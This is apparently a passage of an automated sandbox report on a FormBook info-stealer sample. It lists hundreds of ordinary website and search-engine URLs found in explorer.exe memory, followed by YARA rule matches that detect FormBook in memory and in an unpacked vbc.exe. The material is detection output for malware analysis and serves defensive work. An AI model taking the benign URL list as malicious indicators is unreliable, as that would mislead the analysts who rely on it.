          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 0000000B.00000000.2191217653.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 0000000B.00000000.2188458584.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200635919.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 0000000B.00000000.2188458584.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 0000000B.00000000.2200635919.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2184173591.0000000007960000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2381390031.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2189222370.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2188458584.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2188045174.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000B.00000000.2196199008.000000000839A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
